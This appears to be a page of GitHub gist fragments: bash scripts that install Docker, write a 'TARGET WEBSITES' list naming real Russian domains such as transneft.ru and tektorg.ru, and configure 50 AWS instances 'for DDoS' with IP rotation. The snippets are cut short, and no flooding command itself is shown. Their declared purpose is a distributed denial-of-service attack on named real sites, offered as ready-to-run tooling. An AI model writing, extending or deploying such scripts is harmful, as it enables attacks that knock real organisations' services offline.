This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
set -euo pipefail | |
dnf config-manager --set-enabled crb | |
dnf install epel-release -y | |
dnf install --refresh systemd-resolved systemd-networkd -y | |
systemctl enable systemd-networkd |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
yum update -y | |
yum install docker -y | |
systemctl enable docker.service | |
systemctl start docker.service | |
# ============= TARGET WEBSITES ============== | |
cat <<EOF > targets.txt | |
transneft.ru | |
tektorg.ru |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# Amount of instances for DDoS | |
count=50 | |
# Region | |
region="eu-west-2" | |
# Rotation interval. | |
rotationInterval=300 # in seconds. 5minutes by default | |
# Get VPC id | |
# Attention! If you have more than one VPC, replace it by proper one |